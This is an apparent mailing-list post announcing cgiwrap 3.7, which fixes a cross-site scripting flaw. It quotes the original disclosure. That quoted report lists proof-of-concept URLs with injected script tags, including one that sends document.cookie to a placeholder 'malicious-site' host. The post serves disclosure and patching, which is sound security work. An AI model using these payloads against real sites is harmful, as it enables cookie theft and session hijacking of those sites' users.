The following cross-site scripting vulnerability was reported in cgiwrap. This has just been corrected in version 3.7 which has just been released. http://prdownloads.sourceforge.net/cgiwrap/cgiwrap-3.7.tar.gz All error message output is now html encoded to prevent this problem. -- Nathan > "TAKAGI, Hiromitsu" wrote: > > > > Hi, > > > > I found a cross-site scripting vulnerability in CGIWrap. Cookies > > issued by the server on which CGIWrap is installed can be stolen. > > > > Please try to access the following URLs. > > > > Confirming the bug: > > http://www.unixtools.org/cgi-bin/cgiwrap/%3CS%3E > > http://www.unixtools.org/cgi-bin/cgiwrap/<S> > > http://www.unixtools.org/cgi-bin/cgiwrap/~nneul/<S>TEST</S> > > JavaScript code will be executed: > > >http://www.unixtools.org/cgi-bin/cgiwrap/~nneul/<SCRIPT>alert(document.domain)</SCRIPT> > > >http://www.unixtools.org/cgi-bin/cgiwrap/~nneul/<SCRIPT>document.write(document.domain)</SCRIPT> > > >http://www.unixtools.org/cgi-bin/cgiwrap/<IMG%20SRC=javascript:alert(document.domain)> > > Stealing your Cookies issued by www.unixtools.org, if any: > > >http://www.unixtools.org/cgi-bin/cgiwrap/~nneul/<SCRIPT>window.open("http://malicious-site/save.cgi%3F"+escape(document.cookie))</SCRIPT> > > <snip> > > > > Regards, > > -- > > Hiromitsu Takagi, Ph.D. > > National Institute of Advanced Industrial Science and Technology, > > Tsukuba Central 2, 1-1-1, Umezono, Tsukuba, Ibaraki 305-8568, Japan > > http://www.etl.go.jp/~takagi/ > > _______________________________________________ > cgiwrap-users mailing list > [EMAIL PROTECTED] > http://lists.sourceforge.net/lists/listinfo/cgiwrap-users -- ------------------------------------------------------------ Nathan Neulinger EMail: [EMAIL PROTECTED] University of Missouri - Rolla Phone: (573) 341-4841 CIS - Systems Programming Fax: (573) 341-4216
